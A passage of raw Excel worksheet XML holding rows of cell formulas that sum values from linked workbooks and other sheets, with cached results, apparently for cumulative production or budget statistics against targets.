      </c>
      <c r="R10" s="198">
        <f>'[10]21'!$W$110</f>
        <v>200.253592561285</v>
      </c>
      <c r="S10" s="198">
        <f>'[10]21'!$X$110</f>
        <v>248.373710183939</v>
      </c>
      <c r="T10" s="198">
        <f>'[10]21'!$Y$110</f>
        <v>267.609894031363</v>
      </c>
      <c r="U10" s="198">
        <f>'[10]21'!$T$110</f>
        <v>49.2916666666667</v>
      </c>
      <c r="V10" s="198">
        <f>'[10]21'!$U$110</f>
        <v>35.3809523809524</v>
      </c>
      <c r="W10" s="198">
        <f>'[10]21'!$V$110</f>
        <v>34.5349765258215</v>
      </c>
      <c r="X10" s="198">
        <f>'[10]21'!$Q$110</f>
        <v>11.83</v>
      </c>
      <c r="Y10" s="198">
        <f>'[10]21'!$R$110</f>
        <v>178.32</v>
      </c>
      <c r="Z10" s="198">
        <f>'[10]21'!$S$110</f>
        <v>2942.38</v>
      </c>
    </row>
    <row r="11" ht="15.75" customHeight="1" spans="1:26">
      <c r="A11" s="191"/>
      <c r="B11" s="191"/>
      <c r="C11" s="201" t="s">
        <v>297</v>
      </c>
      <c r="D11" s="201"/>
      <c r="E11" s="194"/>
      <c r="F11" s="194">
        <f>'[10]21'!$D$26+'[11]21'!$D$21+'[12]21'!$D$19+'[13]21'!$D$29+'[14]21'!$D$13+'[14]21'!$D$20</f>
        <v>0</v>
      </c>
      <c r="G11" s="194">
        <f>'[10]21'!$E$26+'[11]21'!$E$21+'[12]21'!$E$19+'[13]21'!$E$29+'[14]21'!$E$13+'[14]21'!$E$20</f>
        <v>0</v>
      </c>
      <c r="H11" s="194">
        <f>G11+'20'!H11</f>
        <v>153.81</v>
      </c>
      <c r="I11" s="194">
        <f>H11+yc!I11</f>
        <v>153.81</v>
      </c>
      <c r="J11" s="194">
        <f>'[10]21'!$I$26+'[11]21'!$I$21+'[12]21'!$I$19+'[13]21'!$I$29+'[14]21'!$E$28+'[14]21'!$E$35</f>
        <v>0</v>
      </c>
      <c r="K11" s="194">
        <f>J11+'20'!K11</f>
        <v>0</v>
      </c>
      <c r="L11" s="194">
        <f>K11+yc!L11</f>
        <v>0</v>
      </c>
      <c r="M11" s="194">
        <f>'[10]21'!$L$26+'[11]21'!$L$21+'[12]21'!$L$19+'[13]21'!$L$29+'[14]21'!$H$28+'[14]21'!$H$35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3774.34000000002</v>
      </c>
      <c r="H12" s="194">
        <f>G12+'20'!H12</f>
        <v>171507.53</v>
      </c>
      <c r="I12" s="194">
        <f>H12+yc!I12</f>
        <v>5113898.78</v>
      </c>
      <c r="J12" s="194">
        <f>J22+J32+J42+J52+J62+J69</f>
        <v>17511.51</v>
      </c>
      <c r="K12" s="194">
        <f>J12+'20'!K12</f>
        <v>346885.365</v>
      </c>
      <c r="L12" s="194">
        <f>K12+yc!L12</f>
        <v>5375991.741</v>
      </c>
      <c r="M12" s="194">
        <f>M22+M32+M42+M52+M62+M69</f>
        <v>239564.050000051</v>
      </c>
      <c r="N12" s="205">
        <f>M12/439000*100</f>
        <v>54.5703986332689</v>
      </c>
      <c r="O12" s="199"/>
      <c r="P12" s="200"/>
      <c r="Q12" s="203" t="s">
        <v>299</v>
      </c>
      <c r="R12" s="204">
        <f>'[16]21'!$W$40</f>
        <v>0</v>
      </c>
      <c r="S12" s="204">
        <f>'[16]21'!$X$40</f>
        <v>0</v>
      </c>
      <c r="T12" s="204">
        <f>'[16]21'!$Y$40</f>
        <v>0</v>
      </c>
      <c r="U12" s="204">
        <f>'[16]21'!$T$40</f>
        <v>0</v>
      </c>
      <c r="V12" s="204">
        <f>'[16]21'!$U$40</f>
        <v>0</v>
      </c>
      <c r="W12" s="204">
        <f>'[16]21'!$V$40</f>
        <v>0</v>
      </c>
      <c r="X12" s="204">
        <f>'[16]21'!$Q$40</f>
        <v>0</v>
      </c>
      <c r="Y12" s="204">
        <f>'[16]21'!$R$40</f>
        <v>0</v>
      </c>
      <c r="Z12" s="204">
        <f>'[16]21'!$S$40</f>
        <v>0</v>
      </c>
    </row>
    <row r="13" ht="15.75" customHeight="1" spans="1:26">
      <c r="A13" s="191"/>
      <c r="B13" s="193"/>
      <c r="C13" s="193"/>
      <c r="D13" s="206" t="s">
        <v>248</v>
      </c>
      <c r="E13" s="194">
        <f>E23+E33+E43+E53+E63+E70</f>
        <v>0</v>
      </c>
      <c r="F13" s="194">
        <f>F23+F33+F43+F53+F63+F70</f>
        <v>-2.00373051484348e-12</v>
      </c>
      <c r="G13" s="194">
        <f>G23+G33+G43+G53+G63+G70</f>
        <v>0</v>
      </c>
      <c r="H13" s="194">
        <f>G13+'20'!H13</f>
        <v>0</v>
      </c>
      <c r="I13" s="194">
        <f>H13+yc!I13</f>
        <v>0</v>
      </c>
      <c r="J13" s="194">
        <f>J23+J33+J43+J53+J63+J70</f>
        <v>0</v>
      </c>
      <c r="K13" s="194">
        <f>J13+'20'!K13</f>
        <v>0</v>
      </c>
      <c r="L13" s="194">
        <f>K13+yc!L13</f>
        <v>0</v>
      </c>
      <c r="M13" s="194">
        <f>M23+M33+M43+M53+M63+M70</f>
        <v>-2.00373051484348e-12</v>
      </c>
      <c r="N13" s="207">
        <f>(M12+M13)/(315000+80000+150000)*100</f>
        <v>43.9567064220276</v>
      </c>
      <c r="O13" s="199"/>
      <c r="P13" s="208" t="s">
        <v>237</v>
      </c>
      <c r="Q13" s="193" t="s">
        <v>230</v>
      </c>
      <c r="R13" s="209">
        <f>'[11]21'!$W$68</f>
        <v>0</v>
      </c>
      <c r="S13" s="209">
        <f>'[11]21'!$X$68</f>
        <v>263.636596158273</v>
      </c>
      <c r="T13" s="209">
        <f>'[11]21'!$Y$68</f>
        <v>266.206969721701</v>
      </c>
      <c r="U13" s="209">
        <f>'[11]21'!$T$68</f>
        <v>0</v>
      </c>
      <c r="V13" s="209">
        <f>'[11]21'!$U$68</f>
        <v>77.5734126984127</v>
      </c>
      <c r="W13" s="209">
        <f>'[11]21'!$V$68</f>
        <v>71.9072769953052</v>
      </c>
      <c r="X13" s="210" t="str">
        <f>'[11]21'!$Q$68</f>
        <v>0.00</v>
      </c>
      <c r="Y13" s="210" t="str">
        <f>'[11]21'!$R$68</f>
        <v>390.97</v>
      </c>
      <c r="Z13" s="210" t="str">
        <f>'[11]21'!$S$68</f>
        <v>6126.50</v>
      </c>
    </row>
    <row r="14" ht="15.75" customHeight="1" spans="1:26">
      <c r="A14" s="191"/>
      <c r="B14" s="193"/>
      <c r="C14" s="193" t="s">
        <v>249</v>
      </c>
      <c r="D14" s="206" t="s">
        <v>250</v>
      </c>
      <c r="E14" s="194">
        <f>E24+E34+E44+E54</f>
        <v>0</v>
      </c>
      <c r="F14" s="194">
        <f>F24+F34+F44+F54</f>
        <v>0</v>
      </c>
      <c r="G14" s="194">
        <f>G24+G34+G44+G54+G62</f>
        <v>3752</v>
      </c>
      <c r="H14" s="194">
        <f>G14+'20'!H14</f>
        <v>58625</v>
      </c>
      <c r="I14" s="194">
        <f>H14+yc!I14</f>
        <v>1023168.676</v>
      </c>
      <c r="J14" s="194">
        <f>J24+J34+J44+J54+J62</f>
        <v>7406.45</v>
      </c>
      <c r="K14" s="194">
        <f>J14+'20'!K14</f>
        <v>114777.445</v>
      </c>
      <c r="L14" s="194">
        <f>K14+yc!L14</f>
        <v>1907721.551</v>
      </c>
      <c r="M14" s="194">
        <f>M24+M34+M44+M54</f>
        <v>57613.78</v>
      </c>
      <c r="N14" s="211"/>
      <c r="O14" s="199"/>
      <c r="P14" s="208"/>
      <c r="Q14" s="193" t="s">
        <v>239</v>
      </c>
      <c r="R14" s="209">
        <f>'[11]21'!$W$71</f>
        <v>232.295271049596</v>
      </c>
      <c r="S14" s="209">
        <f>'[11]21'!$X$71</f>
        <v>218.846011131725</v>
      </c>
      <c r="T14" s="209">
        <f>'[11]21'!$Y$71</f>
        <v>213.83583566108</v>
      </c>
      <c r="U14" s="209">
        <f>'[11]21'!$T$71</f>
        <v>36.125</v>
      </c>
      <c r="V14" s="209">
        <f>'[11]21'!$U$71</f>
        <v>53.4722222222222</v>
      </c>
      <c r="W14" s="209">
        <f>'[11]21'!$V$71</f>
        <v>50.4225352112676</v>
      </c>
      <c r="X14" s="210" t="str">
        <f>'[11]21'!$Q$71</f>
        <v>8.67</v>
      </c>
      <c r="Y14" s="210" t="str">
        <f>'[11]21'!$R$71</f>
        <v>269.50</v>
      </c>
      <c r="Z14" s="210" t="str">
        <f>'[11]21'!$S$71</f>
        <v>4296.00</v>
      </c>
    </row>
    <row r="15" ht="15.75" customHeight="1" spans="1:26">
      <c r="A15" s="191"/>
      <c r="B15" s="193"/>
      <c r="C15" s="193"/>
      <c r="D15" s="193" t="s">
        <v>251</v>
      </c>
      <c r="E15" s="194">
        <f>E25+E35+E45+E55</f>
        <v>0</v>
      </c>
      <c r="F15" s="194">
        <f>F25+F35+F45+F55</f>
        <v>0</v>
      </c>
      <c r="G15" s="194">
        <f>G25+G35+G45+G55</f>
        <v>0</v>
      </c>
      <c r="H15" s="194">
        <f>G15+'20'!H15</f>
        <v>0</v>
      </c>
      <c r="I15" s="194">
        <f>H15+yc!I15</f>
        <v>0</v>
      </c>
      <c r="J15" s="194">
        <f>J25+J35+J45+J55</f>
        <v>0</v>
      </c>
      <c r="K15" s="194">
        <f>J15+'20'!K15</f>
        <v>6212.59</v>
      </c>
      <c r="L15" s="194">
        <f>K15+yc!L15</f>
        <v>120969.09</v>
      </c>
      <c r="M15" s="194"/>
      <c r="N15" s="212"/>
      <c r="O15" s="199"/>
      <c r="P15" s="208"/>
      <c r="Q15" s="193" t="s">
        <v>241</v>
      </c>
      <c r="R15" s="209">
        <f>'[11]21'!$W$72</f>
        <v>67.836919592299</v>
      </c>
      <c r="S15" s="209">
        <f>'[11]21'!$X$72</f>
        <v>63.8793183722879</v>
      </c>
      <c r="T15" s="209">
        <f>'[11]21'!$Y$72</f>
        <v>61.4746724304036</v>
      </c>
      <c r="U15" s="209">
        <f>'[11]21'!$T$72</f>
        <v>36.7916666666667</v>
      </c>
      <c r="V15" s="209">
        <f>'[11]21'!$U$72</f>
        <v>63.9226190476191</v>
      </c>
      <c r="W15" s="209">
        <f>'[11]21'!$V$72</f>
        <v>51.5336854460094</v>
      </c>
      <c r="X15" s="210" t="str">
        <f>'[11]21'!$Q$72</f>
        <v>8.83</v>
      </c>
      <c r="Y15" s="210" t="str">
        <f>'[11]21'!$R$72</f>
        <v>322.17</v>
      </c>
      <c r="Z15" s="210" t="str">
        <f>'[11]21'!$S$72</f>
        <v>4390.67</v>
      </c>
    </row>
    <row r="16" ht="15.75" customHeight="1" spans="1:26">
      <c r="A16" s="191"/>
      <c r="B16" s="193" t="s">
        <v>253</v>
      </c>
      <c r="C16" s="193"/>
      <c r="D16" s="193"/>
      <c r="E16" s="194">
        <f>E26+E36+E46+E56+E64+E71</f>
        <v>0</v>
      </c>
      <c r="F16" s="194"/>
      <c r="G16" s="194">
        <f>G26+G36+G46+G56+G64+G71</f>
        <v>0</v>
      </c>
      <c r="H16" s="194">
        <f>G16+'20'!H16</f>
        <v>0</v>
      </c>
      <c r="I16" s="194">
        <f>H16+yc!I16</f>
        <v>0</v>
      </c>
      <c r="J16" s="194">
        <f>J26+J36+J46+J56+J64+J71+J75</f>
        <v>0</v>
      </c>
      <c r="K16" s="194">
        <f>J16+'20'!K16</f>
        <v>0</v>
      </c>
      <c r="L16" s="194">
        <f>K16+yc!L16</f>
        <v>0</v>
      </c>
      <c r="M16" s="194"/>
      <c r="N16" s="195"/>
      <c r="O16" s="199"/>
      <c r="P16" s="208"/>
      <c r="Q16" s="193" t="s">
        <v>243</v>
      </c>
      <c r="R16" s="209">
        <f>'[11]21'!$W$73</f>
        <v>66.1381653454134</v>
      </c>
      <c r="S16" s="209">
        <f>'[11]21'!$X$73</f>
        <v>61.3350698125208</v>
      </c>
      <c r="T16" s="209">
        <f>'[11]21'!$Y$73</f>
        <v>62.8014550258706</v>
      </c>
      <c r="U16" s="209">
        <f>'[11]21'!$T$73</f>
        <v>36.7916666666667</v>
      </c>
      <c r="V16" s="209">
        <f>'[11]21'!$U$73</f>
        <v>65.5099206349206</v>
      </c>
      <c r="W16" s="209">
        <f>'[11]21'!$V$73</f>
        <v>53.1265258215962</v>
      </c>
      <c r="X16" s="210" t="str">
        <f>'[11]21'!$Q$73</f>
        <v>8.83</v>
      </c>
      <c r="Y16" s="210" t="str">
        <f>'[11]21'!$R$73</f>
        <v>330.17</v>
      </c>
      <c r="Z16" s="210" t="str">
        <f>'[11]21'!$S$73</f>
        <v>4526.38</v>
      </c>
    </row>
    <row r="17" ht="15.75" customHeight="1" spans="1:26">
      <c r="A17" s="191"/>
      <c r="B17" s="193" t="s">
        <v>254</v>
      </c>
      <c r="C17" s="193"/>
      <c r="D17" s="193"/>
      <c r="E17" s="194">
        <f>E27+E37+E47+E57+E65+E72+E83</f>
        <v>650000</v>
      </c>
      <c r="F17" s="194"/>
      <c r="G17" s="194">
        <f>G27+G37+G47+G57+G65+G72</f>
        <v>0</v>
      </c>
      <c r="H17" s="194">
        <f>G17+'20'!H17</f>
        <v>0</v>
      </c>
      <c r="I17" s="194">
        <f>H17+yc!I17</f>
        <v>0</v>
      </c>
      <c r="J17" s="194">
        <f>J27+J37+J47+J57+J65+J72+J76</f>
        <v>0</v>
      </c>
      <c r="K17" s="194">
        <f>J17+'20'!K17</f>
        <v>0</v>
      </c>
      <c r="L17" s="194">
        <f>K17+yc!L17</f>
        <v>0</v>
      </c>
      <c r="M17" s="194"/>
      <c r="N17" s="195"/>
      <c r="O17" s="199"/>
      <c r="P17" s="213" t="s">
        <v>252</v>
      </c>
      <c r="Q17" s="193" t="s">
        <v>230</v>
      </c>
      <c r="R17" s="209">
        <f>'[12]21'!$W$71</f>
        <v>0</v>
      </c>
      <c r="S17" s="209">
        <f>'[12]21'!$X$71</f>
        <v>0</v>
      </c>
      <c r="T17" s="209">
        <f>'[12]21'!$Y$71</f>
        <v>0</v>
      </c>
      <c r="U17" s="209">
        <f>'[12]21'!$T$71</f>
        <v>0</v>
      </c>
      <c r="V17" s="209">
        <f>'[12]21'!$U$71</f>
        <v>0</v>
      </c>
      <c r="W17" s="209">
        <f>'[12]21'!$V$71</f>
        <v>0</v>
      </c>
      <c r="X17" s="209">
        <f>'[12]21'!$Q$71</f>
        <v>0</v>
      </c>
      <c r="Y17" s="209">
        <f>'[12]21'!$R$71</f>
        <v>0</v>
      </c>
      <c r="Z17" s="209">
        <f>'[12]21'!$S$71</f>
        <v>0</v>
      </c>
    </row>
    <row r="18" ht="15.75" customHeight="1" spans="1:26">
      <c r="A18" s="191"/>
      <c r="B18" s="191" t="s">
        <v>231</v>
      </c>
      <c r="C18" s="193" t="s">
        <v>257</v>
      </c>
      <c r="D18" s="193"/>
      <c r="E18" s="194">
        <f>E28+E38+E48+E58+E66+E73</f>
        <v>0</v>
      </c>
      <c r="F18" s="194"/>
      <c r="G18" s="194">
        <f>G28+G38+G48+G58+G66+G73</f>
        <v>0</v>
      </c>
      <c r="H18" s="194">
        <f>G18+'20'!H18</f>
        <v>0</v>
      </c>
      <c r="I18" s="194">
        <f>H18+yc!I18</f>
        <v>0</v>
      </c>
      <c r="J18" s="194">
        <f>J28+J38+J48+J58+J66+J73</f>
        <v>0</v>
      </c>
      <c r="K18" s="194">
        <f>J18+'20'!K18</f>
        <v>0</v>
      </c>
      <c r="L18" s="194">
        <f>K18+yc!L18</f>
        <v>0</v>
      </c>
      <c r="M18" s="194"/>
      <c r="N18" s="195"/>
      <c r="O18" s="199"/>
      <c r="P18" s="214"/>
      <c r="Q18" s="193" t="s">
        <v>233</v>
      </c>
      <c r="R18" s="209">
        <f>'[12]21'!$W$74</f>
        <v>0</v>
      </c>
      <c r="S18" s="209">
        <f>'[12]21'!$X$74</f>
        <v>216.933333333333</v>
      </c>
      <c r="T18" s="209">
        <f>'[12]21'!$Y$74</f>
        <v>221.877060119306</v>
      </c>
      <c r="U18" s="209">
        <f>'[12]21'!$T$74</f>
        <v>0</v>
      </c>
      <c r="V18" s="209">
        <f>'[12]21'!$U$74</f>
        <v>11.9047619047619</v>
      </c>
      <c r="W18" s="209">
        <f>'[12]21'!$V$74</f>
        <v>7.29964788732394</v>
      </c>
      <c r="X18" s="209">
        <f>'[12]21'!$Q$74</f>
        <v>0</v>
      </c>
      <c r="Y18" s="209">
        <f>'[12]21'!$R$74</f>
        <v>60</v>
      </c>
      <c r="Z18" s="209">
        <f>'[12]21'!$S$74</f>
        <v>621.93</v>
      </c>
    </row>
    <row r="19" ht="15.75" customHeight="1" spans="1:26">
      <c r="A19" s="191"/>
      <c r="B19" s="191"/>
      <c r="C19" s="193" t="s">
        <v>259</v>
      </c>
      <c r="D19" s="193"/>
      <c r="E19" s="194">
        <f>E29+E39+E49+E59+E67+E74</f>
        <v>0</v>
      </c>
      <c r="F19" s="194"/>
      <c r="G19" s="194">
        <f>G29+G39+G49+G59+G67+G74</f>
        <v>0</v>
      </c>
      <c r="H19" s="194">
        <f>G19+'20'!H19</f>
        <v>0</v>
      </c>
      <c r="I19" s="194">
        <f>H19+yc!I19</f>
        <v>0</v>
      </c>
      <c r="J19" s="194">
        <f>J29+J39+J49+J59+J67+J74+J78</f>
        <v>0</v>
      </c>
      <c r="K19" s="194">
        <f>J19+'20'!K19</f>
        <v>0</v>
      </c>
      <c r="L19" s="194">
        <f>K19+yc!L19</f>
        <v>0</v>
      </c>
      <c r="M19" s="194"/>
      <c r="N19" s="195"/>
      <c r="O19" s="199"/>
      <c r="P19" s="213" t="s">
        <v>304</v>
      </c>
      <c r="Q19" s="193" t="s">
        <v>291</v>
      </c>
      <c r="R19" s="209">
        <f>'[13]21'!$W$72</f>
        <v>1e-5</v>
      </c>
      <c r="S19" s="209">
        <f>'[13]21'!$X$72</f>
        <v>9.99999999999999e-6</v>
      </c>
      <c r="T19" s="209">
        <f>'[13]21'!$Y$72</f>
        <v>9.14364640883978e-6</v>
      </c>
      <c r="U19" s="209">
        <f>'[13]21'!$T$72</f>
        <v>4.16666666666667e-6</v>
      </c>
      <c r="V19" s="209">
        <f>'[13]21'!$U$72</f>
        <v>4.16666666666667e-6</v>
      </c>
      <c r="W19" s="209">
        <f>'[13]21'!$V$72</f>
        <v>4.24882629107981e-6</v>
      </c>
      <c r="X19" s="209">
        <f>'[13]21'!$Q$72</f>
        <v>1e-6</v>
      </c>
      <c r="Y19" s="209">
        <f>'[13]21'!$R$72</f>
        <v>2.1e-5</v>
      </c>
      <c r="Z19" s="209">
        <f>'[13]21'!$S$72</f>
        <v>0.000362</v>
      </c>
    </row>
    <row r="20" ht="15.75" customHeight="1" spans="1:26">
      <c r="A20" s="191"/>
      <c r="B20" s="193" t="s">
        <v>261</v>
      </c>
      <c r="C20" s="193"/>
      <c r="D20" s="193"/>
      <c r="E20" s="194">
        <f>E30+E40+E50+E60</f>
        <v>0</v>
      </c>
      <c r="F20" s="194"/>
      <c r="G20" s="194">
        <f>G30+G40+G50+G60</f>
        <v>0</v>
      </c>
      <c r="H20" s="194">
        <f>G20+'20'!H20</f>
        <v>0</v>
      </c>
      <c r="I20" s="194">
        <f>H20+yc!I20</f>
        <v>0</v>
      </c>
      <c r="J20" s="194">
        <f>J30+J40+J50+J60</f>
        <v>0</v>
      </c>
      <c r="K20" s="194">
        <f>J20+'20'!K20</f>
        <v>0</v>
      </c>
      <c r="L20" s="194">
        <f>K20+yc!L20</f>
        <v>0</v>
      </c>
      <c r="M20" s="194"/>
      <c r="N20" s="195"/>
      <c r="O20" s="199"/>
      <c r="P20" s="215"/>
      <c r="Q20" s="193" t="s">
        <v>292</v>
      </c>
      <c r="R20" s="209">
        <f>'[13]21'!$W$73</f>
        <v>157.264160113994</v>
      </c>
      <c r="S20" s="209">
        <f>'[13]21'!$X$73</f>
        <v>137.760131401514</v>
      </c>
      <c r="T20" s="209">
        <f>'[13]21'!$Y$73</f>
        <v>238.569124059519</v>
      </c>
      <c r="U20" s="209">
        <f>'[13]21'!$T$73</f>
        <v>100.000004166667</v>
      </c>
      <c r="V20" s="209">
        <f>'[13]21'!$U$73</f>
        <v>8.31548035714286</v>
      </c>
      <c r="W20" s="209">
        <f>'[13]21'!$V$73</f>
        <v>68.3525864084507</v>
      </c>
      <c r="X20" s="209">
        <f>'[13]21'!$Q$73</f>
        <v>24.000001</v>
      </c>
      <c r="Y20" s="209">
        <f>'[13]21'!$R$73</f>
        <v>41.910021</v>
      </c>
      <c r="Z20" s="209">
        <f>'[13]21'!$S$73</f>
        <v>5823.640362</v>
      </c>
    </row>
    <row r="21" ht="15.75" customHeight="1" spans="1:26">
      <c r="A21" s="191" t="s">
        <v>229</v>
      </c>
      <c r="B21" s="193" t="s">
        <v>227</v>
      </c>
      <c r="C21" s="193"/>
      <c r="D21" s="193"/>
      <c r="E21" s="194">
        <v>190000</v>
      </c>
      <c r="F21" s="194">
        <f>'[10]21'!$D$22</f>
        <v>83053.31</v>
      </c>
      <c r="G21" s="194">
        <f>'[10]21'!$E$22</f>
        <v>7896</v>
      </c>
      <c r="H21" s="194">
        <f>G21+'20'!H21</f>
        <v>151097</v>
      </c>
      <c r="I21" s="194">
        <f>H21+yc!I21</f>
        <v>2260535</v>
      </c>
      <c r="J21" s="194">
        <f>'[10]21'!$I$22</f>
        <v>7603.28</v>
      </c>
      <c r="K21" s="194">
        <f>J21+'20'!K21</f>
        <v>169006</v>
      </c>
      <c r="L21" s="194">
        <f>K21+yc!L21</f>
        <v>2235460</v>
      </c>
      <c r="M21" s="194">
        <f>'[10]21'!$L$22</f>
        <v>65144.31</v>
      </c>
      <c r="N21" s="195">
        <f>M21/47000*100</f>
        <v>138.604914893617</v>
      </c>
      <c r="O21" s="199"/>
      <c r="P21" s="215"/>
      <c r="Q21" s="193" t="s">
        <v>294</v>
      </c>
      <c r="R21" s="209">
        <f>'[13]21'!$W$81</f>
        <v>248</v>
      </c>
      <c r="S21" s="209">
        <f>'[13]21'!$X$81</f>
        <v>280.956900110455</v>
      </c>
      <c r="T21" s="209">
        <f>'[13]21'!$Y$81</f>
        <v>275.93950698571</v>
      </c>
      <c r="U21" s="209">
        <f>'[13]21'!$T$81</f>
        <v>6.25</v>
      </c>
      <c r="V21" s="209">
        <f>'[13]21'!$U$81</f>
        <v>29.6392195767196</v>
      </c>
      <c r="W21" s="209">
        <f>'[13]21'!$V$81</f>
        <v>35.7411384976526</v>
      </c>
      <c r="X21" s="209">
        <f>'[13]21'!$Q$81</f>
        <v>1.5</v>
      </c>
      <c r="Y21" s="209">
        <f>'[13]21'!$R$81</f>
        <v>149.381666666667</v>
      </c>
      <c r="Z21" s="209">
        <f>'[13]21'!$S$81</f>
        <v>3045.145</v>
      </c>
    </row>
    <row r="22" ht="15.75" customHeight="1" spans="1:26">
      <c r="A22" s="191"/>
      <c r="B22" s="191" t="s">
        <v>244</v>
      </c>
      <c r="C22" s="193" t="s">
        <v>245</v>
      </c>
      <c r="D22" s="193" t="s">
        <v>246</v>
      </c>
      <c r="E22" s="194">
        <v>163000</v>
      </c>
      <c r="F22" s="194">
        <f>'[10]21'!$D$17</f>
        <v>189966.352</v>
      </c>
      <c r="G22" s="194">
        <f>'[10]21'!$E$17</f>
        <v>0</v>
      </c>
      <c r="H22" s="194">
        <f>G22+'20'!H22</f>
        <v>62660</v>
      </c>
      <c r="I22" s="194">
        <f>H22+yc!I22</f>
        <v>2093641</v>
      </c>
      <c r="J22" s="194">
        <f>'[10]21'!$I$17</f>
        <v>8728.51</v>
      </c>
      <c r="K22" s="194">
        <f>J22+'20'!K22</f>
        <v>139585.87</v>
      </c>
      <c r="L22" s="194">
        <f>K22+yc!L22</f>
        <v>2031047.25</v>
      </c>
      <c r="M22" s="194">
        <f>'[10]21'!$L$17</f>
        <v>113040.482</v>
      </c>
      <c r="N22" s="216">
        <f>(M22+M23)/(50000+150000)*100</f>
        <v>56.520241</v>
      </c>
      <c r="O22" s="199"/>
      <c r="P22" s="215"/>
      <c r="Q22" s="193" t="s">
        <v>233</v>
      </c>
      <c r="R22" s="209">
        <f>'[13]21'!$W$79</f>
        <v>99.4178173358488</v>
      </c>
      <c r="S22" s="209">
        <f>'[13]21'!$X$79</f>
        <v>101.23202750573</v>
      </c>
      <c r="T22" s="209">
        <f>'[13]21'!$Y$79</f>
        <v>102.192482923843</v>
      </c>
      <c r="U22" s="209">
        <f>'[13]21'!$T$79</f>
        <v>99.9988425925926</v>
      </c>
      <c r="V22" s="209">
        <f>'[13]21'!$U$79</f>
        <v>50.7830687830688</v>
      </c>
      <c r="W22" s="209">
        <f>'[13]21'!$V$79</f>
        <v>45.6984220135629</v>
      </c>
      <c r="X22" s="209">
        <f>'[13]21'!$Q$79</f>
        <v>23.9997222222222</v>
      </c>
      <c r="Y22" s="209">
        <f>'[13]21'!$R$79</f>
        <v>255.946666666667</v>
      </c>
      <c r="Z22" s="209">
        <f>'[13]21'!$S$79</f>
        <v>3893.50555555556</v>
      </c>
    </row>
    <row r="23" ht="15.75" customHeight="1" spans="1:26">
      <c r="A23" s="191"/>
      <c r="B23" s="193"/>
      <c r="C23" s="193"/>
      <c r="D23" s="206" t="s">
        <v>248</v>
      </c>
      <c r="E23" s="194"/>
      <c r="F23" s="194">
        <f>'[10]21'!$D$20</f>
        <v>0</v>
      </c>
      <c r="G23" s="194">
        <f>'[10]21'!$E$20</f>
        <v>0</v>
      </c>
      <c r="H23" s="194">
        <f>G23+'20'!H23</f>
        <v>0</v>
      </c>
      <c r="I23" s="194">
        <f>H23+yc!I23</f>
        <v>0</v>
      </c>
      <c r="J23" s="194">
        <f>'[10]21'!$I$20</f>
        <v>0</v>
      </c>
      <c r="K23" s="194">
        <f>J23+'20'!K23</f>
        <v>0</v>
      </c>
      <c r="L23" s="194">
        <f>K23+yc!L23</f>
        <v>0</v>
      </c>
      <c r="M23" s="194">
        <f>'[10]21'!$L$21</f>
        <v>0</v>
      </c>
      <c r="N23" s="217"/>
      <c r="O23" s="199"/>
      <c r="P23" s="214"/>
      <c r="Q23" s="193" t="s">
        <v>235</v>
      </c>
      <c r="R23" s="209">
        <f>'[13]21'!$W$80</f>
        <v>78.2857142857143</v>
      </c>
      <c r="S23" s="209">
        <f>'[13]21'!$X$80</f>
        <v>84.62284035139</v>
      </c>
      <c r="T23" s="209">
        <f>'[13]21'!$Y$80</f>
        <v>79.4502810145915</v>
      </c>
      <c r="U23" s="209">
        <f>'[13]21'!$T$80</f>
        <v>36.4583333333333</v>
      </c>
      <c r="V23" s="209">
        <f>'[13]21'!$U$80</f>
        <v>32.2415674603175</v>
      </c>
      <c r="W23" s="209">
        <f>'[13]21'!$V$80</f>
        <v>32.4806729264476</v>
      </c>
      <c r="X23" s="209">
        <f>'[13]21'!$Q$80</f>
        <v>8.75</v>
      </c>
      <c r="Y23" s="209">
        <f>'[13]21'!$R$80</f>
        <v>162.4975</v>
      </c>
      <c r="Z23" s="209">
        <f>'[13]21'!$S$80</f>
        <v>2767.35333333333</v>
      </c>
    </row>
    <row r="24" ht="15.75" customHeight="1" spans="1:26">
      <c r="A24" s="191"/>
      <c r="B24" s="193"/>
      <c r="C24" s="193" t="s">
        <v>249</v>
      </c>
      <c r="D24" s="206" t="s">
        <v>250</v>
      </c>
      <c r="E24" s="194"/>
      <c r="F24" s="194">
        <f>'[10]21'!$D$21</f>
        <v>0</v>
      </c>
      <c r="G24" s="194">
        <f>'[10]21'!$E$56</f>
        <v>0</v>
      </c>
      <c r="H24" s="194">
        <f>G24+'20'!H24</f>
        <v>0</v>
      </c>
      <c r="I24" s="194">
        <f>H24+yc!I24</f>
        <v>0</v>
      </c>
      <c r="J24" s="194">
        <f>'[10]21'!$I$56</f>
        <v>2638.51</v>
      </c>
      <c r="K24" s="194">
        <f>J24+'20'!K24</f>
        <v>29813.09</v>
      </c>
      <c r="L24" s="194">
        <f>K24+yc!L24</f>
        <v>309639.62</v>
      </c>
      <c r="M24" s="194">
        <f>'[10]21'!$L$20</f>
        <v>0</v>
      </c>
      <c r="N24" s="195"/>
      <c r="O24" s="199"/>
      <c r="P24" s="218" t="s">
        <v>262</v>
      </c>
      <c r="Q24" s="193" t="s">
        <v>233</v>
      </c>
      <c r="R24" s="209">
        <f>'[14]21'!$R$6</f>
        <v>100.796080832823</v>
      </c>
      <c r="S24" s="209">
        <f>'[14]21'!$S$6</f>
        <v>85.4932434755699</v>
      </c>
      <c r="T24" s="209">
        <f>'[14]21'!$T$6</f>
        <v>86.117620826133</v>
      </c>
      <c r="U24" s="209">
        <f>'[14]21'!$O$6</f>
        <v>68.0416666666667</v>
      </c>
      <c r="V24" s="209">
        <f>'[14]21'!$P$6</f>
        <v>57.7043650793651</v>
      </c>
      <c r="W24" s="209">
        <f>'[14]21'!$Q$6</f>
        <v>52.6379107981221</v>
      </c>
      <c r="X24" s="209">
        <f>'[14]21'!$L$6</f>
        <v>16.33</v>
      </c>
      <c r="Y24" s="209">
        <f>'[14]21'!$M$6</f>
        <v>290.83</v>
      </c>
      <c r="Z24" s="209">
        <f>'[14]21'!$N$6</f>
        <v>4484.75</v>
      </c>
    </row>
    <row r="25" ht="15.75" customHeight="1" spans="1:26">
      <c r="A25" s="191"/>
      <c r="B25" s="193"/>
      <c r="C25" s="193"/>
      <c r="D25" s="193" t="s">
        <v>251</v>
      </c>
      <c r="E25" s="194"/>
      <c r="F25" s="194"/>
      <c r="G25" s="194">
        <f>'[10]21'!$E$69</f>
        <v>0</v>
      </c>
      <c r="H25" s="194">
        <f>G25+'20'!H25</f>
        <v>0</v>
      </c>
      <c r="I25" s="194">
        <f>H25+yc!I25</f>
        <v>0</v>
      </c>
      <c r="J25" s="194">
        <f>'[10]21'!$I$69</f>
        <v>0</v>
      </c>
      <c r="K25" s="194">
